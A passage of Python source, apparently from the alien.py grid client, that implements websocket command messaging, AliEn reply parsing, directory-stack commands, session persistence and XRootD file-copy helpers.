nr_tries = int(1)
result = None
non_connection_exception = False
connection_exception = False
while result is None:
if non_connection_exception: break
if nr_tries > 3:
connection_exception = True
break
nr_tries += 1
try:
result = __sendmsg(wb, jsonmsg)
except (websockets.ConnectionClosed, websockets.ConnectionClosedError, websockets.ConnectionClosedOK) as e:
if e.__cause__:
logging.exception(f'SendMsg:: failure because of {e.__cause__}')
# non_connection_exception = True
# break
logging.exception(e)
try:
wb = InitConnection()
except Exception as e:
logging.error(f'SendMsg:: Could not recover connection when disconnected!! Check {_DEBUG_FILE}')
logging.exception(e)
except Exception as e:
logging.exception(e)
non_connection_exception = True
if result is None and not non_connection_exception: time.sleep(0.2)
if time_begin: logging.debug(f"SendMsg::Result received: {deltat_ms(time_begin)} ms")
if not result:
if connection_exception:
msg = f"SendMsg:: communication error!\nSent command: {jsonmsg}"
print_err(msg)
logging.error(msg)
if non_connection_exception:
msg = f'SendMsg:: Non-connection related exception!! Check {_DEBUG_FILE}'
print_err(msg)
logging.error(msg)
return RET(1, '', 'SendMsg:: Empty result received from server')
if 'rawstr' in opts: return result
ret_obj = retf_result2ret(result)
if time_begin: logging.debug(f"SendMsg::Result decoded: {deltat_ms(time_begin)} ms")
return ret_obj
def SendMsgMulti(wb, cmds_list: list, opts: str = '') -> list:
"""Send a json message to the specified websocket; it will return the server answer"""
if not wb:
msg = "SendMsg:: websocket not initialized"
logging.info(msg)
return '' if 'rawstr' in opts else RET(1, '', msg)
if not cmds_list: return []
time_begin = None
if _DEBUG or _DEBUG_TIMING: time_begin = datetime.datetime.now().timestamp()
if _JSON_OUT_GLOBAL or _JSON_OUT or _DEBUG: # if jsout output was requested, then make sure we get the full answer
opts = opts.replace('nokeys', '').replace('nomsg', '')
json_cmd_list = []
for cmd_str in cmds_list:
if '{"command":' in cmd_str and '"options":' in cmd_str: # seems as json input
jsonmsg = cmd_str
else:
jsonmsg = CreateJsonCommand(cmd_str, [], opts) # nomsg/nokeys will be passed to CreateJsonCommand
json_cmd_list.append(jsonmsg)
if _DEBUG:
logging.debug(f"Called from: {sys._getframe().f_back.f_code.co_name}\nSEND COMMAND:: {jsonmsg}") # pylint: disable=protected-access
nr_tries = int(1)
result_list = None
non_connection_exception = False
connection_exception = False
while result_list is None:
if non_connection_exception: break
if nr_tries > 3:
connection_exception = True
break
nr_tries += 1
try:
result_list = __sendmsg_multi(wb, json_cmd_list)
except (websockets.ConnectionClosed, websockets.ConnectionClosedError, websockets.ConnectionClosedOK) as e:
if e.__cause__:
logging.exception(f'SendMsg:: failure because of {e.__cause__}')
# non_connection_exception = True
# break
logging.exception(e)
try:
wb = InitConnection()
except Exception as e:
logging.error(f'SendMsg:: Could not recover connection when disconnected!! Check {_DEBUG_FILE}')
logging.exception(e)
except Exception as e:
logging.exception(e)
non_connection_exception = True
if result_list is None and not non_connection_exception: time.sleep(0.2)
if time_begin: logging.debug(f"SendMsg::Result received: {deltat_ms(time_begin)} ms")
if not result_list: return []
if 'rawstr' in opts: return result_list
ret_obj_list = [retf_result2ret(result) for result in result_list]
if time_begin: logging.debug(f"SendMsg::Result decoded: {deltat_ms(time_begin)} ms")
return ret_obj_list
def retf_result2ret(result: Union[str, dict, None], internal_cmd = False) -> RET:
"""Convert AliEn answer dictionary to RET object"""
global AlienSessionInfo
if not result: return RET()
out_dict = None
if isinstance(result, str):
try:
out_dict = json.loads(result)
except Exception as e:
msg = 'retf_result2ret:: Could not load argument as json!\n{0}'.format(e)
logging.error(msg)
return RET(1, '', msg)
else:
out_dict = result.copy()
if 'metadata' not in out_dict or 'results' not in out_dict: # these works only for AliEn responses
msg = 'retf_results2ret:: Dictionary does not have AliEn answer format'
logging.error(msg)
return RET(1, '', msg)
message_list = [str(item['message']) for item in out_dict['results'] if 'message' in item]
output = '\n'.join(message_list)
ret_obj = RET(int(out_dict["metadata"]["exitcode"]), output.strip(), out_dict["metadata"]["error"], out_dict)
if AlienSessionInfo: # update global state of session
AlienSessionInfo['exitcode'] = out_dict["metadata"]["exitcode"] # keep last exit code
AlienSessionInfo['user'] = out_dict["metadata"]["user"] # always update the current user
current_dir = out_dict["metadata"]["currentdir"]
# if this is first connection, current dir is alien home
if not AlienSessionInfo['alienHome']: AlienSessionInfo['alienHome'] = current_dir
# update the current current/previous dir status
prev_dir = AlienSessionInfo['currentdir'] # last known current dir
if prev_dir != current_dir:
AlienSessionInfo['currentdir'] = current_dir
AlienSessionInfo['prevdir'] = prev_dir
# update directory stack (pushd/popd/dirs)
short_current_dir = current_dir.replace(AlienSessionInfo['alienHome'][:-1], '~')
short_current_dir = short_current_dir[:-1] # remove the last /
if AlienSessionInfo['pathq']:
if AlienSessionInfo['pathq'][0] != short_current_dir: AlienSessionInfo['pathq'][0] = short_current_dir
else:
push2stack(short_current_dir)
return ret_obj
def PrintDict(in_arg: Union[str, dict, list]):
"""Print a dictionary in a nice format"""
if isinstance(in_arg, str):
try:
in_arg = json.loads(in_arg)
except Exception as e:
print_err('PrintDict:: Could not load argument as json!\n{0}'.format(e))
print_out(json.dumps(in_arg, sort_keys = True, indent = 4))
def CreateJsonCommand(cmdline: Union[str, dict], args: Union[None, list] = None, opts: str = '', get_dict: bool = False) -> Union[str, dict]:
"""Return a json with command and argument list"""
if args is None: args = []
if isinstance(cmdline, dict):
out_dict = cmdline.copy()
if 'showmsg' in opts: opts = opts.replace('nomsg', '')
if 'showkeys' in opts: opts = opts.replace('nokeys', '')
if 'nomsg' in opts: out_dict["options"].insert(0, '-nomsg')
if 'nokeys' in opts: out_dict["options"].insert(0, '-nokeys')
return out_dict if get_dict else json.dumps(out_dict)
if not args:
args = shlex.split(cmdline)
cmd = args.pop(0) if args else ''
else:
cmd = cmdline
if 'nomsg' in opts: args.insert(0, '-nomsg')
if 'nokeys' in opts: args.insert(0, '-nokeys')
jsoncmd = {"command": cmd, "options": args}
return jsoncmd if get_dict else json.dumps(jsoncmd)
def GetMeta(result: dict, meta: str = '') -> list:
"""Extract from input and return a list of 2nd arg selectable of cwd user error exitcode"""
output = []
if not result: return output
if isinstance(result, dict) and 'metadata' in result: # these works only for AliEn responses
meta_opts_list = meta.split() if meta else []
if 'cwd' in meta_opts_list or 'all' in meta_opts_list: output.append(result["metadata"]["currentdir"])
if 'user' in meta_opts_list or 'all' in meta_opts_list: output.append(result["metadata"]["user"])
if 'error' in meta_opts_list or 'all' in meta_opts_list: output.append(result["metadata"]["error"])
if 'exitcode' in meta_opts_list or 'all' in meta_opts_list: output.append(result["metadata"]["exitcode"])
return output
def PrintColor(color: str) -> str:
"""Disable color if the terminal does not have capability"""
return color if _HAS_COLOR else ''
def cursor_vertical(lines: int = 0):
"""Move the cursor up/down N lines"""
if lines == 0: return
out_char = '\x1b[1A' # UP
if lines < 0:
out_char = '\x1b[1B' # DOWN
lines = abs(lines)
sys.stdout.write(out_char * lines)
sys.stdout.flush()
def cursor_horizontal(lines: int = 0):
"""Move the cursor left/right N lines"""
if lines == 0: return
out_char = '\x1b[1C' # RIGHT
if lines < 0:
out_char = '\x1b[1D' # LEFT
lines = abs(lines)
sys.stdout.write(out_char * lines)
sys.stdout.flush()
def cleanup_temp():
"""Remove from disk all recorded temporary files"""
if AlienSessionInfo['templist']:
for f in AlienSessionInfo['templist']:
if os.path.isfile(f): os.remove(f)
def now_str() -> str: return str(datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
def deltat_ms(t0: Union[str, float, None] = None) -> str:
"Return delta t in ms from a time start; if no argment it return a timestamp in ms"
if not t0:
return f"{datetime.datetime.now().timestamp() * 1000:.3f}"
else:
t0 = float(t0)
return f"{(datetime.datetime.now().timestamp() - t0) * 1000:.3f}"
def deltat_us(t0: Union[str, float, None] = None) -> str:
"Return delta t in ms from a time start; if no argment it return a timestamp in ms"
if not t0:
return f"{datetime.datetime.now().timestamp() * 1000000:.3f}"
else:
t0 = float(t0)
return f"{(datetime.datetime.now().timestamp() - t0) * 1000000:.3f}"
def is_help(args: Union[str, list]) -> bool:
if not args: return False
if isinstance(args, str): args = args.split()
help_opts = ('-h', '--h', '-help', '--help')
return any(opt in args for opt in help_opts)
def retf_print(ret_obj: RET, opts: str = '') -> int:
"""Process a RET object; it will return the exitcode
opts content will steer the logging and message printing:
- noprint : silence all stdout/stderr printing
- noerr/noout : silence the respective messages
- info/warn/err/debug : will log the stderr to that facility
- json : will print just the json (if present)
"""
if 'json' in opts:
if ret_obj.ansdict:
json_out = json.dumps(ret_obj.ansdict, sort_keys = True, indent = 3)
if _DEBUG: logging.debug(json_out)
print_out(json_out)
else:
print_err('This command did not return a json dictionary')
return ret_obj.exitcode
if ret_obj.exitcode != 0:
if 'info' in opts: logging.info(ret_obj.err)
if 'warn' in opts: logging.warning(ret_obj.err)
if 'err' in opts: logging.error(ret_obj.err)
if 'debug' in opts: logging.debug(ret_obj.err)
if ret_obj.err and not ('noerr' in opts or 'noprint' in opts):
print_err(f'{ret_obj.err.strip()}')
else:
if ret_obj.out and not ('noout' in opts or 'noprint' in opts):
print_out(f'{ret_obj.out.strip()}')
return ret_obj.exitcode
def read_conf_file(file: str) -> dict:
"""Convert a configuration file with key = value format to a dict"""
DICT_INFO = {}
try:
with open(file) as rel_file:
for line in rel_file:
line = line.partition('#')[0].rstrip()
name, var = line.partition("=")[::2]
var = re.sub(r"^\"", '', str(var.strip()))
var = re.sub(r"\"$", '', var)
DICT_INFO[name.strip()] = var
except Exception:
pass
return DICT_INFO
def file2list(file: str) -> list:
"""Parse a file and return a list of elements"""
if not file or not os.path.isfile(file): return []
file_list = []
with open(file) as filecontent:
for line in filecontent:
if not line or ignore_comments_re.search(line) or emptyline_re.match(line): continue
file_list.extend(line.strip().split())
return file_list
def fileline2list(file: str) -> list:
"""Parse a file and return a list of file lines"""
if not file or not os.path.isfile(file): return []
file_list = []
with open(file) as filecontent:
for line in filecontent:
if not line or ignore_comments_re.search(line) or emptyline_re.match(line): continue
file_list.extend([line.strip()])
return file_list
def import_aliases():
global AlienSessionInfo
alias_file = os.path.join(os.path.expanduser("~"), ".alienpy_aliases")
global AlienSessionInfo
if os.path.exists(alias_file): AlienSessionInfo['alias_cache'] = read_conf_file(alias_file)
def os_release() -> dict:
return read_conf_file('/etc/os-release')
def get_lfn_key(lfn_obj: dict) -> str:
"""get either lfn key or file key from a file description"""
if not lfn_obj or not isinstance(lfn_obj, dict): return ''
if "lfn" in lfn_obj: return lfn_obj["lfn"]
if "file" in lfn_obj: return lfn_obj["file"]
return ''
def pid_uid(pid: int) -> int:
'''Return username of UID of process pid'''
uid = int(-1)
try:
with open(f'/proc/{pid}/status') as proc_status:
for line in proc_status:
# Uid, Gid: Real, effective, saved set, and filesystem UIDs(GIDs)
if line.startswith('Uid:'): uid = int((line.split()[1]))
except Exception:
pass
return uid
def is_my_pid(pid: int) -> bool: return bool(pid_uid(int(pid)) == os.getuid())
def writePidFile(filename: str):
try:
with open(filename, 'w') as f: f.write(str(os.getpid()))
except Exception as e:
logging.error('{0}'.format(e))
def GetSessionFilename() -> str: return os.path.join(os.path.expanduser("~"), ".alienpy_session")
def SessionSave():
try:
with open(GetSessionFilename(), "w") as f:
line1 = f"CWD = {AlienSessionInfo['currentdir']}\n"
if not AlienSessionInfo['prevdir']: AlienSessionInfo['prevdir'] = AlienSessionInfo['currentdir']
line2 = f"CWDPREV = {AlienSessionInfo['prevdir']}\n"
f.writelines([line1, line2])
except Exception as e:
logging.warning("SessionSave:: failed to write file")
logging.exception(e)
def SessionRestore(wb):
if os.getenv('ALIENPY_NO_CWD_RESTORE'): return
global AlienSessionInfo
session = read_conf_file(GetSessionFilename())
if not session: return
sys_cur_dir = AlienSessionInfo['currentdir']
if 'CWD' in session: AlienSessionInfo['currentdir'] = session['CWD']
if 'CWDPREV' in session: AlienSessionInfo['prevdir'] = session['CWDPREV']
if AlienSessionInfo['currentdir'] and (sys_cur_dir != AlienSessionInfo['currentdir']):
cd(wb, AlienSessionInfo['currentdir'], opts = 'nocheck')
def exitcode(args: Union[list, None] = None): # pylint: disable=unused-argument
"""Return the latest global recorded exitcode"""
return RET(0, f"{AlienSessionInfo['exitcode']}", '')
def unixtime2local(timestamp: Union[str, int], decimals: bool = True) -> str:
"""Convert unix time to a nice custom format"""
timestr = str(timestamp)
if len(timestr) < 10: return ''
micros = None
millis = None
if len(timestr) > 10:
time_decimals = timestr[10:]
if len(time_decimals) <= 3:
time_decimals = time_decimals.ljust(3, '0')
millis = datetime.timedelta(milliseconds=int(time_decimals))
else:
time_decimals = time_decimals.ljust(6, '0')
micros = datetime.timedelta(microseconds=int(time_decimals))
unixtime = timestr[:10]
utc_time = datetime.datetime.fromtimestamp(int(unixtime), datetime.timezone.utc)
local_time = utc_time.astimezone()
if decimals and millis:
return f'{(local_time + millis).strftime("%Y-%m-%d %H:%M:%S")}.{time_decimals}{local_time.strftime("%z")}'
if decimals and micros:
return (local_time + micros).strftime("%Y-%m-%d %H:%M:%S.%f%z") # (%Z)"))
return local_time.strftime("%Y-%m-%d %H:%M:%S%z") # (%Z)"))
def convert_time(str_line: str) -> str:
"""Convert the first 10 digit unix time like string from str argument to a nice time"""
timestamp = re.findall(r"^(\d{10}) \[.*", str_line)
if timestamp:
nice_timestamp = f"{PrintColor(COLORS.BIGreen)}{unixtime2local(timestamp[0])}{PrintColor(COLORS.ColorReset)}"
return str_line.replace(str(timestamp[0]), nice_timestamp)
return ''
def cd(wb, args: Union[str, list] = None, opts: str = '') -> RET:
"""Override cd to add to home and to prev functions"""
if args is None: args = []
if isinstance(args, str): args = args.split()
if is_help(args): return get_help_srv(wb, 'cd')
if args:
if args[0] == '-': args = [AlienSessionInfo['prevdir']]
if 'nocheck' not in opts and AlienSessionInfo['currentdir'].rstrip('/') == args[0].rstrip('/'): return RET(0)
return SendMsg(wb, 'cd', args, opts)
def push2stack(path: str):
if not str: return
global AlienSessionInfo
if AlienSessionInfo['alienHome']: home = AlienSessionInfo['alienHome'][:-1]
if home and home in path: path = path.replace(home, '~')
AlienSessionInfo['pathq'].appendleft(path)
def deque_pop_pos(dq: deque, pos: int = 1) -> str:
if abs(pos) > len(dq) - 1: return ''
pos = - pos
dq.rotate(pos)
if pos > 0:
val = dq.pop()
if len(dq) > 1: dq.rotate(- (pos - 1))
else:
val = dq.popleft()
if len(dq) > 1: dq.rotate(abs(pos) - 1)
return val
def list_remove_item(target_list: list, item_list):
target_list[:] = [el for el in target_list if el != item_list]
def get_arg(target: list, item) -> bool:
"""Remove inplace all instances of item from list and return True if found"""
len_begin = len(target)
list_remove_item(target, item)
len_end = len(target)
return len_begin != len_end
def get_arg_value(target: list, item):
"""Remove inplace all instances of item and item+1 from list and return item+1"""
val = None
for x in target:
if x == item:
val = target.pop(target.index(x) + 1)
target.pop(target.index(x))
return val
def get_arg_2values(target: list, item):
"""Remove inplace all instances of item, item+1 and item+2 from list and return item+1, item+2"""
val = None
for x in target:
if x == item:
val2 = target.pop(target.index(x) + 2)
val1 = target.pop(target.index(x) + 1)
target.pop(target.index(x))
return (val1, val2)
def DO_dirs(wb, args: Union[str, list, None] = None) -> RET:
"""dirs"""
return DO_path_stack(wb, 'dirs', args)
def DO_popd(wb, args: Union[str, list, None] = None) -> RET:
"""popd"""
return DO_path_stack(wb, 'popd', args)
def DO_pushd(wb, args: Union[str, list, None] = None) -> RET:
"""pushd"""
return DO_path_stack(wb, 'pushd', args)
def DO_path_stack(wb, cmd: str = '', args: Union[str, list, None] = None) -> RET:
"""Implement dirs/popd/pushd for directory stack manipulation"""
if not cmd: return RET(1)
if args is None: return RET(1)
global AlienSessionInfo
arg_list = args.split() if isinstance(args, str) else args
do_not_cd = False
if '-n' in arg_list:
do_not_cd = True
arg_list.remove('-n')
msg = ''
help_msg = ('The folloswinf syntax is required\n'
'dirs [-clpv] [+N | -N]\n'
'popd [-n] [+N | -N]\n'
'pushd [-n] [+N | -N | dir]')
if (cmd != 'dirs' and len(arg_list) > 1) or (cmd == 'dirs' and len(arg_list) > 2) or is_help(arg_list):
return RET(1, '', help_msg)
sign = None
position = None
pos = None
for arg in arg_list:
if arg[0] == '+' or arg[0] == '-':
sign = arg[0]
if not arg[1:].isdecimal(): return RET(1, '', "-N | +N argument is invalid")
position = int(arg[1:])
arg_list.remove(arg)
pos = int(arg)
if cmd == "dirs":
if '-c' in arg_list:
AlienSessionInfo['pathq'].clear()
return RET(0)
if not arg_list: msg = ' '.join(AlienSessionInfo['pathq'])
if position and sign:
if position > len(AlienSessionInfo['pathq']) - 1: return RET(0)
if sign == "+":
msg = AlienSessionInfo['pathq'][position] # Nth position from top (last/top element have the index 0)
if sign == "-":
msg = AlienSessionInfo['pathq'][len(AlienSessionInfo['pathq']) - 1 - position] # Nth position from last
return RET(0, msg) # end of dirs
if cmd == "popd":
if position and sign:
if position > len(AlienSessionInfo['pathq']) - 1: return RET(0)
deque_pop_pos(AlienSessionInfo['pathq'], pos)
msg = " ".join(AlienSessionInfo['pathq'])
return RET(0, msg)
if not arg_list:
AlienSessionInfo['pathq'].popleft()
if not do_not_cd: cd(wb, AlienSessionInfo['pathq'][0]) # cd to the new top of stack
msg = " ".join(AlienSessionInfo['pathq'])
return RET(0, msg) # end of popd
if cmd == "pushd":
if position and sign:
if position > len(AlienSessionInfo['pathq']) - 1: return RET(0)
if sign == "+":
AlienSessionInfo['pathq'].rotate(-1 * position)
if not do_not_cd: cd(wb, AlienSessionInfo['pathq'][0], 'log') # cd to the new top of stack
if sign == "-":
AlienSessionInfo['pathq'].rotate(-(len(AlienSessionInfo['pathq']) - 1 - position))
if not do_not_cd: cd(wb, AlienSessionInfo['pathq'][0], 'log') # cd to the new top of stack
msg = " ".join(AlienSessionInfo['pathq'])
return RET(0, msg) # end of +N|-N
if not arg_list:
if len(AlienSessionInfo['pathq']) < 2: return RET(0)
old_cwd = AlienSessionInfo['pathq'].popleft()
new_cwd = AlienSessionInfo['pathq'].popleft()
push2stack(old_cwd)
push2stack(new_cwd)
if not do_not_cd: cd(wb, AlienSessionInfo['pathq'][0], 'log')
msg = " ".join(AlienSessionInfo['pathq'])
return RET(0, msg) # end of +N|-N
path = expand_path_grid(wb, arg_list[0])
if do_not_cd:
cwd = AlienSessionInfo['pathq'].popleft()
push2stack(path)
push2stack(cwd)
else:
push2stack(path)
cd(wb, AlienSessionInfo['pathq'][0], 'log') # cd to the new top of stack
msg = " ".join(AlienSessionInfo['pathq'])
return RET(0, msg) # end of +N|-N
return RET() # dummy return just in case cmd is not proper
def DO_version(args: Union[list, None] = None) -> RET: # pylint: disable=unused-argument
stdout = (f'alien.py version: {ALIENPY_VERSION_STR}\n'
f'alien.py version date: {ALIENPY_VERSION_DATE}\n'
f'alien.py location: {os.path.realpath(__file__)}\n'
f'script location: {ALIENPY_EXECUTABLE}\n'
f'Interpreter: {os.path.realpath(sys.executable)}\n'
f'Python version: {sys.version}\n')
if _HAS_XROOTD:
stdout = f'{stdout}XRootD version: {xrd_client.__version__}\nXRootD path: {xrd_client.__file__}'
else:
stdout = f'{stdout}XRootD version: Not Found!'
return RET(0, stdout, "")
def DO_exit(args: Union[list, None] = None) -> RET:
if args is None: args = []
if len(args) > 0 and args[0] == '-h':
msg = 'Command format: exit [code] [stderr|err] [message]'
return RET(0, msg)
code = AlienSessionInfo['exitcode']
msg = ''
if len(args) > 0:
if args[0].isdecimal(): code = args.pop(0)
if args[0] == 'stderr' or args[0] == 'err':
args.pop(0)
print2stdout = sys.stderr
msg = ' '.join(args).strip()
if msg:
if code != 0: print_err(msg)
else: print_out(msg)
sys.exit(int(code))
def xrdcp_help() -> str:
helpstr = f'''Command format is of the form of (with the strict order of arguments):
cp <options> src dst
or
cp <options> -input input_file
where src|dst are local files if prefixed with file:// or file: or grid files otherwise
and -input argument is a file with >src dst< pairs
after each src,dst can be added comma separated specifiers in the form of: @disk:N,SE1,SE2,!SE3
where disk selects the number of replicas and the following specifiers add (or remove) storage endpoints from the received list
options are the following :
-h : print help
-f : replace destination file (if destination is local it will be replaced only if integrity check fails)
-P : enable persist on successful close semantic
-cksum : check hash sum of the file; for downloads the central catalogue md5 will be verified
-y <nr_sources> : use up to the number of sources specified in parallel (N.B. Ignored as it breaks download of files stored in archives)
-S <aditional TPC streams> : uses num additional parallel streams to do the transfer. (max = 15)
-chunks <nr chunks> : number of chunks that should be requested in parallel
-chunksz <bytes> : chunk size (bytes)
-T <nr_copy_jobs> : number of parralel copy jobs from a set (for recursive copy); defaults to 8 for downloads
-timeout <seconds> : the job will fail if did not finish in this nr of seconds
-retry <times> : retry N times the copy process if failed
-ratethreshold <bytes/s> : fail the job if the speed is lower than specified bytes/s
-noxrdzip: circumvent the XRootD mechanism of zip member copy and download the archive and locally extract the intended member.
N.B.!!! for recursive copy (all files) the same archive will be downloaded for each member.
If there are problems with native XRootD zip mechanism, download only the zip archive and locally extract the contents
for the recursive copy of directories the following options (of the find command) can be used:
-glob <globbing pattern> : this is the usual AliEn globbing format; {PrintColor(COLORS.BIGreen)}N.B. this is NOT a REGEX!!!{PrintColor(COLORS.ColorReset)} defaults to all "*"
-select <pattern> : select only these files to be copied; {PrintColor(COLORS.BIGreen)}N.B. this is a REGEX applied to full path!!!{PrintColor(COLORS.ColorReset)}
-name <pattern> : select only these files to be copied; {PrintColor(COLORS.BIGreen)}N.B. this is a REGEX applied to a directory or file name!!!{PrintColor(COLORS.ColorReset)}
-name <verb>_string : where verb = begin|contain|ends|ext and string is the text selection criteria.
verbs are aditive : -name begin_myf_contain_run1_ends_bla_ext_root
{PrintColor(COLORS.BIRed)}N.B. the text to be filtered cannont have underline <_> within!!!{PrintColor(COLORS.ColorReset)}
-parent <parent depth> : in destination use this <parent depth> to add to destination ; defaults to 0
-a : copy also the hidden files .* (for recursive copy)
-j <queue_id> : select only the files created by the job with <queue_id> (for recursive copy)
-l <count> : copy only <count> nr of files (for recursive copy)
-o <offset> : skip first <offset> files found in the src directory (for recursive copy)'''
return helpstr
def _xrdcp_sysproc(cmdline: str, timeout: Union[str, int, None] = None) -> RET:
"""xrdcp stanalone system command"""
if not cmdline: return RET(1, '', '_xrdcp_sysproc :: no cmdline')
if timeout is not None: timeout = int(timeout)
# --nopbar --posc
xrdcp_cmdline = f'xrdcp -N -P {cmdline}'
return runShellCMD(xrdcp_cmdline, captureout = True, do_shell = False, timeout = timeout)
def _xrdcp_copyjob(wb, copy_job: CopyFile, xrd_cp_args: XrdCpArgs, printout: str = '') -> int:
"""xrdcp based task that process a copyfile and it's arguments"""
if not copy_job: return
overwrite = xrd_cp_args.overwrite
batch = xrd_cp_args.batch
sources = xrd_cp_args.sources
chunks = xrd_cp_args.chunks
chunksize = xrd_cp_args.chunksize
makedir = xrd_cp_args.makedir
tpc = xrd_cp_args.tpc
posc = xrd_cp_args.posc
# hashtype = xrd_cp_args.hashtype
streams = xrd_cp_args.streams
cksum = xrd_cp_args.cksum
timeout = xrd_cp_args.timeout
rate = xrd_cp_args.rate
cmdline = f'{copy_job.src} {copy_job.dst}'
return retf_print(_xrdcp_sysproc(cmdline, timeout))
def XrdCopy_xrdcp(wb, job_list: list, xrd_cp_args: XrdCpArgs, printout: str = '') -> list:
"""XRootD copy command :: the actual XRootD copy process"""
if not _HAS_XROOTD:
print_err("XRootD not found or lower version thant 5.3.3")
return []
if not xrd_cp_args:
print_err("cp arguments are not set, XrdCpArgs tuple missing")
return []
overwrite = xrd_cp_args.overwrite
batch = xrd_cp_args.batch
makedir = xrd_cp_args.makedir
# ctx = mp.get_context('forkserver')
# q = ctx.JoinableQueue()
# p = ctx.Process(target=_xrdcp_copyjob, args=(q,))
# p.start()
# print(q.get())
# p.join()
for copy_job in job_list:
if _DEBUG: logging.debug("\nadd copy job with\nsrc: {0}\ndst: {1}\n".format(copy_job.src, copy_job.dst))
xrdcp_cmd = f' {copy_job.src} {copy_job.dst}'
if _DEBUG: print_out(copy_job)
return []
def lfnAccessUrl(wb, lfn: str, local_file: str = '', specs: Union[None, list, str] = None, isWrite: bool = False, strictspec: bool = False, httpurl: bool = False) -> dict:
"""Query central services for the access envelope of a lfn, it will return a lfn:server answer with envelope pairs"""
if not wb: return {}
if not lfn: return {}
if not specs: specs = []
if specs and isinstance(specs, str): specs = specs_split.split(specs)
if isWrite:
if not local_file or not os.path.exists(local_file):
print_err(f'lfnAccessUrl/write token:: invalid local file: {local_file}')
return {}
access_type = 'write'
size = int(os.stat(local_file).st_size)
md5sum = md5(local_file)
files_with_default_replicas = ['.sh', '.C', '.jdl', '.xml']
if any(lfn.endswith(ext) for ext in files_with_default_replicas) and size < 1048576: # we have a special lfn
if not specs: specs.append('disk:4') # if no specs defined then default to disk:4
get_envelope_arg_list = ['-s', size, '-m', md5sum, access_type, lfn]
if not specs: specs.append('disk:2') # hard default if nothing is specified
else:
access_type = 'read'
get_envelope_arg_list = [access_type, lfn]
if specs: get_envelope_arg_list.append(",".join(specs))
if httpurl: get_envelope_arg_list.insert(0, '-u')
if strictspec: get_envelope_arg_list.insert(0, '-f')
ret_obj = SendMsg(wb, 'access', get_envelope_arg_list, opts = 'nomsg')
if ret_obj.exitcode != 0 or 'results' not in ret_obj.ansdict:
ret_obj = ret_obj._replace(err = f'No token for {lfn} :: errno {ret_obj.exitcode} -> {ret_obj.err}')
retf_print(ret_obj, opts = 'err noprint')
return {}
return ret_obj.ansdict
def lfn2uri(wb, lfn: str, local_file: str = '', specs: Union[None, list, str] = None, isWrite: bool = False, strictspec: bool = False, httpurl: bool = False) -> str:
"""Return the list of access URIs for all replica of an ALICE lfn - can be used directly with xrdcp"""
result = lfnAccessUrl(wb, lfn, local_file, specs, isWrite, strictspec, httpurl)
if not result: return ''
output_list = []
for replica in result['results']:
output_list.append(repr(f"{replica['url']}?xrd.wantprot=unix&authz={replica['envelope']}"))
return '\n'.join(output_list)
def lfn2meta(wb, lfn: str, local_file: str = '', specs: Union[None, list, str] = None, isWrite: bool = False, strictspec: bool = False, httpurl: bool = False) -> str:
"""Create metafile for download of an ALICE lfn and return it's location - can be used directly with xrdcp"""
if isWrite:
print_err('Metafile creation possible only for download')
return ''
result = lfnAccessUrl(wb, lfn, local_file, specs, isWrite, strictspec, httpurl)
if not result: return ''
# pprint(result)
size_4meta = result['results'][0]['size'] # size SHOULD be the same for all replicas
md5_4meta = result['results'][0]['md5'] # the md5 hash SHOULD be the same for all replicas
file_in_zip = None
url_list_4meta = []
for replica in result['results']:
url_components = replica['url'].rsplit('#', maxsplit = 1)
if len(url_components) > 1: file_in_zip = url_components[1]
# if is_pfn_readable(url_components[0]): # it is a lot cheaper to check readability of replica than to try and fail a non-working replica
url_list_4meta.append(f'{url_components[0]}?xrd.wantprot=unix&authz={replica["envelope"]}')
# Create the metafile as a temporary uuid5 named file (the lfn can be retrieved from meta if needed)
metafile = create_metafile(make_tmp_fn(lfn, '.meta4', uuid5 = True), lfn, local_file, size_4meta, md5_4meta, url_list_4meta)
if not metafile:
print_err(f"Could not create the download metafile for {lfn}")
return ''
subprocess.run(shlex.split(f'mv {metafile} {os.getcwd()}/')) # keep it in local directory
metafile = os.path.realpath(os.path.basename(metafile))
if file_in_zip and 'ALIENPY_NOXRDZIP' not in os.environ:
return f'{metafile}?xrdcl.unzip={file_in_zip}'
else:
return f'{metafile}'
def lfn2fileTokens(wb, arg_lfn2file: lfn2file, specs: Union[None, list, str] = None, isWrite: bool = False, strictspec: bool = False, httpurl: bool = False) -> dict:
"""Query central services for the access envelope of a lfn, it will return a lfn:server answer with envelope pairs"""
if not wb: return {}
if not arg_lfn2file: return {}
lfn = arg_lfn2file.lfn
file = arg_lfn2file.file
if not specs: specs = []
if specs and isinstance(specs, str): specs = specs_split.split(specs)
result = lfnAccessUrl(wb, lfn, file, specs, isWrite, strictspec, httpurl)
if not result:
return {"lfn": lfn, "answer": {}}
qos_tags = [el for el in specs if 'ALICE::' not in el] # for element in specs, if not ALICE:: then is qos tag
SEs_list_specs = [el for el in specs if 'ALICE::' in el] # explicit requests of SEs
SEs_list_total = [replica["se"] for replica in result["results"]]
# let's save for each replica the orginal request info
for replica in result["results"]:
replica["qos_specs"] = qos_tags # qos tags from specs
replica["SElist_specs"] = SEs_list_specs # SE from specs
replica["SElist"] = SEs_list_total # list of SEs that were used
replica["file"] = file
replica["lfn"] = lfn
return {"lfn": lfn, "answer": result}
def lfn2fileTokens_list(wb, input_lfn_list: list, specs: Union[None, list, str] = None, isWrite: bool = False, strictspec: bool = False, httpurl: bool = False) -> list:
"""Query central services for the access envelope of the list of lfns, it will return a list of lfn:server answer with envelope pairs"""
if not wb: return []
access_list = []
if not input_lfn_list: return access_list
if specs is None: specs = []
for l2f in input_lfn_list: access_list.append(lfn2fileTokens(wb, l2f, specs, isWrite, strictspec, httpurl))
return access_list
def expand_path_local(path_input: str, check_path: bool = False, check_writable: bool = False) -> str:
"""Given a string representing a local file, return a full path after interpretation of HOME location, current directory, . and .. and making sure there are only single /"""
exp_path = None
try:
exp_path = Path(path_input).expanduser().resolve().as_posix()
except RuntimeError:
print_err(f"Loop encountered along the resolution of {path_input}")
if exp_path is None: return ''
if os.path.exists(exp_path):
is_dir = os.path.isdir(exp_path)
is_file = os.path.isfile(exp_path)
if is_dir:
exp_path = f'{exp_path}/'
if check_writable and not os.access(exp_path, os.W_OK): return '' # checking for writable dir
else:
if check_path: return ''
if path_input.endswith('/'): exp_path = f'{exp_path}/'
return exp_path
def expand_path_grid(wb, path_input: str, check_path: bool = False, check_writable: bool = False) -> str:
"""Given a string representing a GRID file (lfn), return a full path after interpretation of AliEn HOME location, current directory, . and .. and making sure there are only single /"""
exp_path = path_input
exp_path = lfn_prefix_re.sub('', exp_path)
exp_path = re.sub(r"^\/*\%ALIEN[\/\s]*", AlienSessionInfo['alienHome'], exp_path) # replace %ALIEN token with user grid home directory
